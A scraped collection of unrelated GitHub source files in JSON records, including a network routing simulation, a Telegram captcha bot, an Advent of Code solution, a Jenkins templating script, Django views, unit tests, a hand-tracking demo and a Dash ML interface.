\"hello\", str(self.x) + \" \" + str(self.y))\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n global t\n if self.id == 1:\n t = time.time()\n\n def send_msg(self, msg, dst):\n\n # Search in routing table\n founded = False\n dst = dst + 1\n tmp4 = 0\n for item5 in self.route_table:\n if str(item5.key) == str(dst):\n founded = True\n tmp4 = item5.nxt_hop\n break\n\n if founded:\n # relay to next hop\n # --------- source -------------- next hop ------------ destination ------ current hop\n m = Message( str(self.id) + \"+\" + str(tmp4) + \"+\" + str(dst) + \"+\" + str(self.id) , \"Message\" , msg )\n print(\"send \" + str(self.id) + \" \" + str(msg))\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n else:\n # rrq and then send message\n # --------- current hop -------------- source\n m = Message(str(self.id) + \"+\" + str(self.id), \"RRQ\", str(dst) + \"+\" + str(self.rrq_counter))\n self.rrq_received.append([str(self.id), str(dst), str(self.rrq_counter)])\n self.rrq_counter = self.rrq_counter + 1\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n\n # save message to send later\n delayed_send_thread = threading.Thread(target=self.send_msg_check, args=(msg, dst))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n def send_msg_check(self, msg, dst):\n while True:\n\n time.sleep(0.2)\n\n founded = False\n nxthop = 0\n for ii, item3 in enumerate(self.route_table):\n if int(item3.key) == int(dst):\n founded = True\n nxthop = item3.nxt_hop\n\n if founded:\n m = Message(str(self.id) + \"+\" + str(nxthop) + \"+\" + str(dst) + \"+\" + str(self.id), \"Message\", msg)\n print(\"send \" + str(self.id) + \" \" + str(msg))\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n return\n else:\n continue\n\n def change_loc(self, _x, _y):\n self.x = _x\n self.y = _y\n\n self.route_table = []\n self.init_finish = False\n self.nbrs = []\n self.rrq_received = []\n self.rrq_counter = 1\n\n hello_thread = threading.Thread(target=self.hello, args=())\n hello_thread.daemon = True\n hello_thread.start()\n\n# -------------------------------------------------------------------------------------------------------------------\nclass Server:\n def __init__(self, _n, _ip, _port, _d, _nodes):\n self.ip = _ip\n self.port = _port\n self.d = _d\n self.nodes = _nodes\n self.send_thread = []\n self.n = _n\n\n self.hello_counter = 0\n self.hello_sent_counter = 0\n self.hello_ack = 0\n\n main_thread = threading.Thread(target=self.main, args=())\n main_thread.daemon = True\n main_thread.start()\n\n def main(self):\n server_thread = threading.Thread(target=self.server_up, args=())\n server_thread.daemon = True\n server_thread.start()\n time.sleep(0.1 * self.n)\n connect_thread = threading.Thread(target=self.connect, args=())\n connect_thread.daemon = True\n connect_thread.start()\n\n def server_up(self):\n server_socket = socket.socket()\n server_socket.bind((self.ip, self.port))\n while True:\n server_socket.listen(2)\n conn, address = server_socket.accept()\n listen_thread = threading.Thread(target=self.listen, args=([conn]))\n listen_thread.daemon = True\n listen_thread.start()\n\n def connect(self):\n for ii in range(len(self.nodes)):\n client_socket = socket.socket()\n client_socket.connect((self.nodes[ii][1], self.nodes[ii][2])) # ------------------------- order is imp\n self.send_thread.append(client_socket)\n\n def listen(self, conn):\n while True:\n data = conn.recv(1024)\n if not data:\n break\n else:\n prob_drop = random.uniform(0, 1)\n\n msg_rec = Message(**json.loads(data, encoding=\"utf-8\"))\n\n if msg_rec.type == \"hello\":\n tmp_id = int(msg_rec.nid) - 1\n\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp_id), [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n self.hello_counter = self.hello_counter + 1\n tmp_id = int(msg_rec.nid) - 1\n tmp_loc = [int(item3) for item3 in msg_rec.value.split()]\n self.nodes[tmp_id][3] = tmp_loc[0]\n self.nodes[tmp_id][4] = tmp_loc[1]\n\n if self.hello_counter == n:\n self.hello_all()\n self.hello_counter = 0\n\n elif msg_rec.type == \"hello_ack\":\n\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(msg_rec.nid) - 1, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n nbr_list = [int(msg_rec.value)]\n delayed_send_thread = threading.Thread(target=self.send_nbrs, args=(nbr_list, [msg_rec]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n self.hello_ack = self.hello_ack + 1\n if self.hello_ack == self.hello_sent_counter:\n m = Message(str(self.n * self.n), \"init_finish\", \"none\")\n self.send_to_all([m])\n self.hello_sent_counter = 0\n self.hello_ack = 0\n\n elif msg_rec.type == \"RRQ\":\n tmp2 = msg_rec.nid.split(\"+\")\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp2[0]) - 1, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n # --------- source -------------- prev hop\n nbr_list = self.get_nbrs(int(tmp2[0]) - 1)\n if nbr_list:\n m = Message(msg_rec.nid, \"RRQ\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.send_nbrs, args=(nbr_list, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"RRP\":\n\n tmp3 = msg_rec.nid.split(\"+\")\n\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp3[0]) - 1, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n m = Message(tmp3[0], \"RRP\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp3[1]), [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"Message\":\n # --------- source -------------- next hop ------------ destination ------ prev hop\n tmp2 = msg_rec.nid.split(\"+\")\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp2[3]) - 1, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n\n m = Message(tmp2[0] + \"+\" + tmp2[3] + \"+\" + tmp2[2], \"Message\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp2[1]), [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n def hello_all(self):\n for iii in range(n):\n nbr_list = self.get_nbrs(iii)\n\n if nbr_list:\n m = Message(str(iii + 1), \"hello\", str(self.nodes[iii][3]) + \" \" + str(self.nodes[iii][4]))\n delayed_send_thread = threading.Thread(target=self.send_nbrs, args=(nbr_list, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n self.hello_sent_counter = self.hello_sent_counter + len(nbr_list)\n\n def send_to_all(self, msg):\n byte_array = json.dumps(msg[0].__dict__).encode(\"utf-8\")\n for item3 in self.send_thread:\n time.sleep(random.uniform(0, 1))\n item3.send(byte_array)\n\n def send_single(self, dst, msg):\n byte_array = json.dumps(msg[0].__dict__).encode(\"utf-8\")\n time.sleep(random.uniform(0, 1))\n self.send_thread[dst - 1].send(byte_array)\n\n def send_nbrs(self, nbr_list, msg):\n byte_array = json.dumps(msg[0].__dict__).encode(\"utf-8\")\n for item3 in nbr_list:\n time.sleep(random.uniform(0, 1))\n self.send_thread[item3 - 1].send(byte_array)\n\n def get_nbrs(self, xx):\n nbr_list = []\n for item3 in self.nodes:\n if item3[0] != self.nodes[xx][0]:\n if (item3[3] - self.nodes[xx][3] ) * (item3[3] - self.nodes[xx][3] ) + (item3[4] - self.nodes[xx][4]) * (item3[4] - self.nodes[xx][4]) < self.d * self.d:\n nbr_list.append(item3[0])\n return nbr_list\n\n# Main ------------------------------------------------------------------------------\n# input\nd = int(input())\nx = int(input())\ny = int(input())\nn = int(input())\n\nnode_data = []\nfor i in range(n):\n tmp = input().split()\n node_data.append(tmp)\n\ng = BattleGround(x, y)\nserver_ip = \"127.0.0.1\"\nserver_port = 6000\n\nnodes = []\n# Node Constructor\nfor i in range(n):\n tmp = node_data[i]\n nodes.append(Vehicle(int(tmp[0]), int(tmp[3]), int(tmp[4]), tmp[1], int(tmp[2]), int(tmp[5]), server_ip, server_port ,g, n))\n\n# Prepare data foe server\nnode_data = []\nfor i in range(n):\n node_data.append([nodes[i].id, nodes[i].ip, nodes[i].port, 0, 0])\nserver = Server(n, server_ip, server_port, d, node_data)\n\n# wait until first step is finished\nwhile True:\n tmp = True\n for item in nodes:\n tmp = item.init_finish and tmp\n if tmp:\n print(\"Initialization has been finished successfully\")\n break\n\nf = open(\"scenario.txt\", \"r\")\nf1 = f.readlines()\ncommands = []\nfor x in f1:\n commands.append(x)\n\nfor item in commands:\n tmp = item.split(\" \")\n\n if tmp[0] == \"SendMessage\":\n info = tmp[1].split(\"-\")\n nodes[int(info[0]) - 1].send_msg(info[1], int(info[2]) - 1)\n\n elif tmp[0] == \"ChangeLoc\":\n print(\"change location\")\n # do the work\n tmp3 = \"\"\n for item3 in tmp[1:]:\n tmp2 = item3.split(\"-\")\n if int(tmp2[1]) > g.x or int(tmp2[2]) > g.y:\n print(\"location error\")\n else:\n tmp3 = tmp3 + str(tmp2[0]) + \"(\" + str(tmp2[1]) + \",\" + str(tmp2[2]) + \")\" + \"-\"\n print(tmp3)\n\n for item2 in tmp[1:]:\n tmp2 = item2.split(\"-\")\n nodes[int(tmp2[0]) - 1].change_loc(int(tmp2[1]), int(tmp2[2]))\n\n # wait to finish the job\n while True:\n tmp = True\n for item2 in nodes:\n tmp = item2.init_finish and tmp\n if tmp:\n print(\"New neighbors has been founded successfully\")\n break\n\n elif tmp[0] == \"Wait\":\n print(\"Waiting ............... \")\n time.sleep(int(tmp[1]))\n\ntime.sleep(n * n * n)\n","repo_name":"mhmd97z/data-network-simulations-assignments","sub_path":"aodv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39732546215","text":"from aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import CallbackQuery, InputMediaPhoto\n\nfrom bot.db.requests import DbRequests\nfrom bot.keyboards.inline_keyboards import create_inline_kb, main_menu_keyboard\nfrom bot.services.captcha_generator import get_captcha_image_with_buttons\nfrom bot.states.verification import UserVerification\n\n\nasync def process_fail_captcha(callback: CallbackQuery,\n db_request: DbRequests,\n state: FSMContext):\n\n callback.bot.captcha_count -= 1\n captcha_count = callback.bot.captcha_count\n if captcha_count > 0:\n captcha, options = get_captcha_image_with_buttons()\n keyboard = create_inline_kb(2, *options)\n\n callback.message.bot.data['captcha_key'] = captcha['key']\n await callback.message.edit_media(\n media=InputMediaPhoto(captcha['img']),\n reply_markup=keyboard)\n\n alert_text = f\"Вы неверно разгадали капчу.\\\n Попыток осталось: {captcha_count}\"\n await callback.answer(\n text=alert_text, show_alert=True)\n else:\n await state.reset_state()\n await db_request.block_user(callback.from_user.id)\n await callback.bot.delete_message(\n callback.message.chat.id, callback.message.message_id)\n await callback.answer('Вы заблокированы!!')\n\n await callback.answer()\n\n\nasync def process_success_captcha(callback: CallbackQuery,\n db_request: DbRequests,\n state: FSMContext):\n await state.finish()\n await db_request.verify_user(callback.from_user.id)\n\n await callback.message.answer_photo(\n photo='AgACAgIAAxkBAAOnZBsVA1ZXmdFmg_ob5SNPv8dWiU8AAonJMRvXNdlIt42MBjLEiioBAAMCAANzAAMvBA', # noqa: E501\n caption='• Зарабатывай $TON получая рекламу\\n'\n '• Получи тысячи активных пользователей отправив $TON',\n reply_markup=main_menu_keyboard(), parse_mode='HTML')\n await callback.bot.delete_message(\n callback.message.chat.id, callback.message.message_id)\n await callback.answer()\n\n\ndef register_captcha_handlers(dp: Dispatcher):\n dp.register_callback_query_handler(\n process_fail_captcha,\n lambda btn: btn.data != btn.bot.data.get(\n 'captcha_key'),\n state=UserVerification.CaptchaState)\n dp.register_callback_query_handler(\n process_success_captcha,\n lambda btn: btn.data == btn.bot.data.get(\n 'captcha_key'),\n state=UserVerification.CaptchaState)\n","repo_name":"makedream1/capwallet","sub_path":"bot/bot/handlers/captcha_handlers.py","file_name":"captcha_handlers.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26134001731","text":"'''\nhttps://adventofcode.com/2017/day/6\n'''\nDAY = 6\n\nfrom utils import *\nfrom collections import deque\n\n\ndef parser(test=False):\n return deque(Input(DAY, 2017, test=test, line_parser=integers)[0])\n\n\ndef reallocate(banks):\n\n red_blocks = max(banks)\n rot = -banks.index(red_blocks)\n banks.rotate(rot)\n banks[0] = 0\n\n banks.rotate(-1)\n rot -= 1\n\n while red_blocks:\n banks[0] += 1\n red_blocks -= 1\n banks.rotate(-1)\n rot -= 1\n\n banks.rotate(-rot)\n \n return banks\n\n\ndef part1(input):\n banks = input\n visited = set()\n visited.add(tuple(banks))\n\n cycles = 0\n while True:\n \n banks = reallocate(banks)\n cycles += 1\n\n t_banks = tuple(banks)\n if t_banks in visited:\n return cycles, banks\n\n visited.add(t_banks)\n \n \n\ndef part2(input):\n pass\n \n\ndef main():\n input = parser()\n print('RESULTS')\n\n result_1, rep_config = part1(input)\n print(f'Part 1: {result_1}')\n\n result_2, _ = part1(rep_config)\n print(f'Part 2: {result_2}')\n\n\nif __name__ == \"__main__\":\n test(DAY, parser, \n lambda i: part1(i)[0], [5], \n lambda i: part1(part1(i)[1])[0], [4])\n main()","repo_name":"jacoboglez/adventofcode","sub_path":"2017/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27115114583","text":"import argparse\nimport glob\nimport os\nimport re\nimport shutil\nfrom distutils.dir_util import copy_tree\nfrom tempfile import TemporaryDirectory\n\nfrom jenkins_config_templating import execute_config_templating, read_symlink_entries\n\nBASH_SCRIPT_JENKINS_TO_TEMP = \\\n 'ssh-keygen -R {}; ssh -C ubuntu@{} \"bash -s\" < Invalid

    \")\n user = MyUser.objects.get(id=request.user.id)\n admins = MyUser.objects.filter(groups__name='super-admin')\n students = Students.objects.all().select_related()\n teachers = Teachers.objects.all().select_related()\n context = {\n 'students': students,\n 'teachers': teachers,\n 'admins': admins\n }\n print(user)\n if(user in admins):\n return render(request, 'accountinfo/admins.html', context)\n if user in MyUser.objects.filter(groups__name='Student'):\n return students_view(request, context)\n if user in MyUser.objects.filter(groups__name='Teacher'):\n return render(request, 'accountinfo/teach.html', context)\n\n return HttpResponse(\"You are nobody\")\n\n#View file for the student role, shows them only their own data\ndef students_view(request, context):\n me = MyUser.objects.filter(id=request.user.id)[0]\n print(me.first_name, me.date_of_birth)\n email = me.id\n name = me.first_name\n dob = me.date_of_birth\n return HttpResponse(f'Your details are \\n Email-ID: {email} \\n Name: {name} \\n DOB: {dob}')\n\n#View function to be used by the admin role only, to add new teachers\ndef add_teacher(request):\n if request is None:\n return None\n new_t_email = request.POST[\"teacheremail\"]\n new_t_name = request.POST[\"newname\"]\n if len(list(Teachers.objects.filter(email=new_t_email))) > 0:\n return HttpResponseRedirect(reverse('accountinfo:returnData'))\n new_t = Teachers.objects.create(email=new_t_email, name=new_t_name)\n new_t.save()\n\n return HttpResponseRedirect(reverse('accountinfo:returnData'))\n\n#View function to be used by a teacher or an admin, to add new students\ndef add_student(request):\n print(\"Here\")\n if request is None:\n return None\n new_st_email = request.POST[\"studentemail\"]\n new_st_name = request.POST[\"newname\"]\n if len(list(Students.objects.filter(email=new_st_email))) > 0:\n return HttpResponseRedirect(reverse('accountinfo:returnData'))\n new_st = Students.objects.create(email=new_st_email, name=new_st_name)\n new_st.save()\n print(new_st.id)\n \n return HttpResponseRedirect(reverse('accountinfo:returnData'))\n","repo_name":"rtkm3131/TASK-Credicxo","sub_path":"task/Credicxo/accountinfo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36108139667","text":"from project.movie import Movie\r\nimport unittest\r\n\r\nclass TestMovie(unittest.TestCase):\r\n NAME = 'Fast10'\r\n YEAR = 2022\r\n RATING = 5.8\r\n def setUp(self):\r\n self.movie = Movie(self.NAME, self.YEAR, self.RATING)\r\n\r\n def test__name_property(self):\r\n result = self.movie.name\r\n self.assertEqual(result, self.NAME)\r\n\r\n def test__name__when_try_set_empty_string(self):\r\n with self.assertRaises(ValueError) as ex:\r\n self.movie.name = ''\r\n self.assertIsNotNone(ex)\r\n self.assertEqual('Name cannot be an empty string!', str(ex.exception))\r\n\r\n def test__name__when_change_name(self):\r\n self.movie.name = 'test1'\r\n result = self.movie.name\r\n self.assertEqual(result, 'test1')\r\n\r\n def test__year_property(self):\r\n result = self.movie.year\r\n self.assertEqual(result, self.YEAR)\r\n\r\n def test__year__when_it_is_not_valid(self):\r\n with self.assertRaises(ValueError) as ex:\r\n self.movie.year = 1885\r\n self.assertIsNotNone(ex)\r\n self.assertEqual('Year is not valid!', str(ex.exception))\r\n\r\n def test__year__when_change_year(self):\r\n self.movie.year = 1990\r\n result = self.movie.year\r\n self.assertEqual(result, 1990)\r\n\r\n def test__add_actor__when_it_is_possible(self):\r\n actor = 'Mitko Kiosev'\r\n self.movie.add_actor(actor)\r\n self.assertTrue(actor in self.movie.actors)\r\n\r\n def test__add_actor__when_it_is_already_added(self):\r\n actor = 'Mitko Kiosev'\r\n self.movie.add_actor(actor)\r\n result = self.movie.add_actor(actor)\r\n expected_result = f'{actor} is already added in the list of actors!'\r\n self.assertEqual(result, expected_result)\r\n\r\n\r\n def test__gt__when_first_is_great(self):\r\n movie2 = Movie('Fast09', 2000, self.RATING - 0.1)\r\n result = self.movie > movie2\r\n expected_result = f'\"{self.movie.name}\" is better than \"{movie2.name}\"'\r\n self.assertEqual(result, expected_result)\r\n\r\n def test__gt__when_second_is_great(self):\r\n movie2 = Movie('Fast09', 2000, self.RATING + 0.1)\r\n result = self.movie > movie2\r\n expected_result = f'\"{movie2.name}\" is better than \"{self.movie.name}\"'\r\n self.assertEqual(result, expected_result)\r\n\r\n def test__repr__(self):\r\n actor = 'Mitko Kiosev'\r\n self.movie.add_actor(actor)\r\n result = str(self.movie)\r\n expected_result = f\"Name: {self.NAME}\\nYear of Release: {self.YEAR}\\nRating: {self.RATING:.2f}\\nCast: Mitko Kiosev\"\r\n self.assertEqual(result, expected_result)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"dimitarkiosev/Python-OOP-Jun-2022","sub_path":"11. Exams/02. Python OOP Exam - 10 April 2022/3. Testing/test_movie.py","file_name":"test_movie.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40632348439","text":"# Created by Aryan Maurya\n\nimport cv2\nimport mediapipe as mp\nimport time\n\ncap = cv2.VideoCapture(0)\n\nmpHands = mp.solutions.hands\nhands = mpHands.Hands()\nmpDraw = mp.solutions.drawing_utils # using mpDraw to draw the 21 points on hand\n\nprevTime = 0 # previous time is 0\ncurrTime = 0 # current time is 0\n\nwhile True:\n success, img = cap.read()\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # converting imagery to RGB\n results = hands.process(imgRGB)\n\n # print(results.multi_hand_landmarks) --> prints landmarks if hand is detected\n\n if results.multi_hand_landmarks:\n for handLms in results.multi_hand_landmarks: # considering each hand tracked\n for id, lm in enumerate(handLms.landmark):\n # print(id, lm)\n # prints the id from 0 to 20 on x,y and z co-ordinates in decimal values.\n\n h, w, c = img.shape # height,width and channel of image\n\n cx, cy = int(lm.x * w), int(lm.y * h)\n # central x and y axis -> taking integer value of x multiplied by width and int value of y multiplied by height\n print(id, cx, cy)\n # prints id no, cx & cy position\n\n if id == 0:\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n # draws a small magenta circle on id 0 (i.e. on the wrist) of radius 15.\n\n mpDraw.draw_landmarks(img, handLms, mpHands.HAND_CONNECTIONS) # handLms --> single hand , Hand Connections to connect the dots\n\n\n currTime = time.time() # stores the exact time during runtime\n fps = 1/(currTime-prevTime) # formula to calculate frames per second\n prevTime = currTime # previous time changes to current time\n\n cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 3)\n # inserting FPS monitor in img display as integer value.\n # (10,70) is the position for monitor, 3 and 3 are scale and thickness respectively.\n # (255,0,255) represents magenta color which is used for displaying fps.\n\n\n cv2.imshow(\"Image\", img) # Displays the original image\n cv2.waitKey(1)\n","repo_name":"aryan-maurya/Volume-Gesture-Control","sub_path":"HandTrack.py","file_name":"HandTrack.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"16407292603","text":"import json\nimport os\nimport logging\nimport pathlib\nimport shutil\nimport zipfile, time\nimport uuid, requests\n\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output, State, MATCH, ALL\nimport dash_uploader as du\nimport dash_table\nimport dash_bootstrap_components as dbc\nimport numpy as np\nimport pandas as pd\nimport PIL.Image as Image\nimport plotly.graph_objects as go\n\nfrom file_manager import filename_list, move_a_file, move_dir, add_paths_from_dir, \\\n check_duplicate_filename, docker_to_local_path, local_to_docker_path, file_explorer\nfrom helper_utils import SimpleJob\nfrom helper_utils import plot_figure, get_bottleneck, get_job, generate_loss_plot, load_from_dir, str_to_dict, \\\n model_list_GET_call, get_gui_components, get_counter, get_host\nfrom assets.kwarg_editor import JSONParameterEditor\nimport templates\n\n\n### GLOBAL VARIABLES AND DATA LOADING\nDATA_DIR = str(os.environ['DATA_DIR'])\nMODEL_DATABASE = {\"The Model\": \"path-to-model\"} # hardcoded model database as dict\nUSER = 'admin'\nMODELS = model_list_GET_call()\nDOCKER_DATA = pathlib.Path.home() / 'data'\nLOCAL_DATA = str(os.environ['DATA_DIR'])\nDOCKER_HOME = str(DOCKER_DATA) + '/'\nLOCAL_HOME = str(LOCAL_DATA)\nUPLOAD_FOLDER_ROOT = DOCKER_DATA / 'upload'\nSUPPORTED_FORMATS = ['tiff', 'tif', 'jpg', 'jpeg', 'png']\nHOST_NICKNAME = str(os.environ['HOST_NICKNAME'])\nnum_processors, num_gpus = get_host(HOST_NICKNAME)\n\n#### SETUP DASH APP ####\nexternal_stylesheets = [dbc.themes.BOOTSTRAP, \"../assets/segmentation-style.css\"]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets) #, suppress_callback_exceptions=True)\n# server = app.server\napp.title = \"Data Clinic\"\napp._favicon = 'mlex.ico'\ndu.configure_upload(app, UPLOAD_FOLDER_ROOT, use_upload_id=False)\nlogging.getLogger('werkzeug').setLevel(logging.ERROR)\n\n### BEGIN DASH CODE ###\nheader = templates.header()\n\nSIDEBAR = [\n dbc.Card(\n id=\"sidebar\",\n children=[\n dbc.CardHeader(\"Exploring Data with Machine Learning\"),\n dbc.CardBody([\n dbc.FormGroup([\n dbc.Label('Action'),\n dcc.Dropdown(\n id='action',\n options=[\n {'label': 'Model Training', 'value': 'train_model'},\n # {'label': 'Latent Space Exploration', 'value': 'evaluate_model'},\n {'label': 'Test Prediction using Model', 'value': 'prediction_model'},\n ],\n value='train_model')\n ]),\n dbc.FormGroup([\n dbc.Label('Model'),\n dcc.Dropdown(\n id='model-selection',\n options=MODELS,\n value=MODELS[0]['value'])\n ]),\n dbc.FormGroup([\n dbc.Label('Data'),\n file_explorer,\n ]),\n dbc.Button('Execute',\n id='execute',\n n_clicks=0,\n className='m-1',\n style={'width': '100%', 'justify-content': 'center'})\n ])\n ]\n ),\n dbc.Card(\n children=[\n dbc.CardHeader(\"Parameters\"),\n dbc.CardBody([html.Div(id='app-parameters')])\n ]\n ),\n dbc.Modal(\n [\n dbc.ModalHeader(\"Warning\"),\n dbc.ModalBody(id=\"warning-msg\"),\n dbc.ModalFooter([\n dbc.Button(\n \"OK\", id=\"ok-button\", color='danger', outline=False,\n className=\"ms-auto\", n_clicks=0\n ),\n ]),\n ],\n id=\"warning-modal\",\n is_open=False,\n ),\n dcc.Store(id='warning-cause', data=''),\n dcc.Store(id='counters', data=get_counter(USER))\n]\n\n\nLOSS_PLOT = dbc.Collapse(id = 'show-plot',\n children = dbc.Card(id=\"plot-card\",\n children=[dbc.CardHeader(\"Loss Plot\"),\n dbc.CardBody([\n dcc.Graph(id='loss-plot',\n style={'width':'100%', 'height': '20rem'})])\n ])),\n\n\n# Job Status Display\nJOB_STATUS = dbc.Card(\n children=[\n dbc.CardHeader(\"List of Jobs\"),\n dbc.CardBody(\n children=[\n dbc.Row(\n [\n dbc.Button(\"Deselect Row\", id=\"deselect-row\", style={'margin-left': '1rem'}),\n dbc.Button(\"Stop Job\", id=\"stop-row\", color='warning'),\n dbc.Button(\"Delete Job\", id=\"delete-row\", color='danger'),\n ]\n ),\n dash_table.DataTable(\n id='jobs-table',\n columns=[\n {'name': 'Job ID', 'id': 'job_id'},\n {'name': 'Type', 'id': 'job_type'},\n {'name': 'Name', 'id': 'name'},\n {'name': 'Status', 'id': 'status'},\n {'name': 'Parameters', 'id': 'parameters'},\n {'name': 'Experiment ID', 'id': 'experiment_id'},\n {'name': 'Dataset', 'id': 'dataset'},\n {'name': 'Logs', 'id': 'job_logs'}\n ],\n data=[],\n hidden_columns=['job_id', 'experiment_id', 'dataset'],\n row_selectable='single',\n style_cell={'padding': '1rem',\n 'textAlign': 'left',\n 'overflow': 'hidden',\n 'textOverflow': 'ellipsis',\n 'maxWidth': 0},\n fixed_rows={'headers': True},\n css=[{\"selector\": \".show-hide\", \"rule\": \"display: none\"}],\n page_size=8,\n style_data_conditional=[\n {'if': {'column_id': 'status', 'filter_query': '{status} = complete'},\n 'backgroundColor': 'green',\n 'color': 'white'},\n {'if': {'column_id': 'status', 'filter_query': '{status} = failed'},\n 'backgroundColor': 'red',\n 'color': 'white'},\n ],\n style_table={'height': '30rem', 'overflowY': 'auto'} #, 'overflowX': 'scroll'}\n )\n ],\n ),\n dbc.Modal(\n [\n dbc.ModalHeader(\"Warning\"),\n dbc.ModalBody('Models cannot be recovered after deletion. \\\n Do you still want to proceed?\"'),\n dbc.ModalFooter([\n dbc.Button(\n \"OK\", id=\"confirm-delete-row\", color='danger', outline=False,\n className=\"ms-auto\", n_clicks=0\n ),\n ]),\n ],\n id=\"delete-modal\",\n is_open=False,\n ),\n dbc.Modal([\n dbc.ModalHeader(\"Job Logs\"),\n dbc.ModalBody(id='log-display'),\n dbc.ModalFooter(dbc.Button(\"Close\", id=\"modal-close\", className=\"ml-auto\")),\n ],\n id='log-modal',\n size='xl')\n ]\n)\n\n\n# main section with interactive graph (card 1) and job table (card 2)\ncolumn_02 = html.Div([\n dbc.Card(\n id=\"inter_graph\",\n style={\"width\" : \"100%\"},\n children=[\n dbc.CardHeader(\"Graphical Representation\", className=\"card-title\"),\n dbc.CardBody(\n dbc.Col(\n [dbc.Row([\n html.Img(id='orig_img', title=\"Input Image\",\n style={'width':'15vw', 'height': '200px', 'padding':'0px', 'display': 'inline-block'}),\n html.Img(id='ls_graph', title='',\n style={'width':'30vw', 'height': '200px', 'padding':'0px', 'display': 'inline-block'}),\n html.Img(id='rec_img', title=\"Reconstructed Image\",\n style={'width':'15vw', 'height': '200px', 'padding':'0px', 'display': 'inline-block'})\n ], align=\"center\", justify='center'),\n dbc.Row([\n dbc.Col(dbc.Row(html.P('Input Image'), align=\"center\", justify='center'), width=3),\n dbc.Col(dbc.Row(html.P('Latent Space'), align=\"center\", justify='center')),\n dbc.Col(dbc.Row(html.P('Reconstructed Image') ,align=\"center\", justify='center'), width=3),\n ], align=\"center\", justify='center'),\n dbc.Label('Image: ', id='current-image-label'),\n dcc.Slider(id='img-slider',\n min=0,\n value=0,\n tooltip={'always_visible': True, 'placement': 'bottom'})]\n ), style={'margin-bottom': '0rem', 'align-items': 'center', 'justify-content': 'center'}\n ),\n dbc.CardFooter(id='data-size-out')\n ]),\n html.Div(LOSS_PLOT),\n JOB_STATUS,\n dcc.Interval(id='interval', interval=5 * 1000, n_intervals=0),\n])\n\n\nRESOURCES_SETUP = html.Div(\n [\n dbc.Modal(\n [\n dbc.ModalHeader(\"Choose number of computing resources:\"),\n dbc.ModalBody(\n children=[\n dbc.FormGroup([\n dbc.Label(f'Number of CPUs (Maximum available: {num_processors})'),\n dbc.Input(id='num-cpus',\n type=\"int\",\n value=2)]),\n dbc.FormGroup([\n dbc.Label(f'Number of GPUs (Maximum available: {num_gpus})'),\n dbc.Input(id='num-gpus',\n type=\"int\",\n value=0)]),\n dbc.FormGroup([\n dbc.Label('Model Name'),\n dbc.Input(id='model-name',\n type=\"str\",\n value=\"\")])\n ]),\n dbc.ModalFooter(\n dbc.Button(\n \"Submit Job\", id=\"submit\", className=\"ms-auto\", n_clicks=0\n )\n ),\n ],\n id=\"resources-setup\",\n centered=True,\n is_open=False,\n ),\n ]\n)\n\n\n##### DEFINE LAYOUT ####\napp.layout = html.Div(\n [\n header,\n dbc.Container(\n [\n dbc.Row(\n [dbc.Col(SIDEBAR, width=4),\n dbc.Col(column_02, 